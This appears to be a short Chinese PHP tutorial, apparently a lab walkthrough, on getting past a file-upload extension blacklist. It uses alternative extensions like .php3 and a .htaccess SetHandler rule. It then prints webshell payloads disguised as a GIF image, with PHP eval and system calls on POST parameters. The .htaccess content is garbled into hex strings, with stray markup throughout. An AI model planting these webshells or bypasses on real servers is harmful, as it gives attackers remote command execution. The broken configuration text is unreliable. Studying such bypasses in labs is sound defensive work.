首頁 >後端開發 >php教程 >文件上傳繞過黑名單的方法

文件上傳繞過黑名單的方法

不言
不言原創
2018-07-05 14:13:106165瀏覽

這篇文章主要介紹了關於文件上傳繞過黑名單的方法,有著一定的參考價值,現在分享給大家,有需要的朋友可以參考一下

 本關主要透過設定上傳後綴,限制asp,php,jsp 等後綴,不允許上傳。

 姿勢一:本次繞過方式為修改後綴為.php3,php5等,這裡是黑名單驗證('.asp','.aspx','.php','.jsp') ,我們可上傳php3,php5...等這樣可以被伺服器解析的後綴名稱

#姿勢二:重寫檔案解析規則繞過

# 1.先上傳先上傳一個名為.htaccess文件,內容如下:

7dbec1342203bda950e5c4d4c26c928b

# SetHandler application/x-httpd-php

d4f50085796fcbc8b99545763f01d848


2、上傳1.jpg腳本
內容:

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>
##########
<span style='margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important'><br>最后查看结果如下:<br><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""><br></span>
###以上就是本文的全部內容,希望對大家的學習有所幫助,更多相關內容請關注PHP中文網! ######相關推薦:#########PHP使用Azure Storage Blob上傳檔案###############nginx memcache快取的介紹###### ####

以上是文件上傳繞過黑名單的方法的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn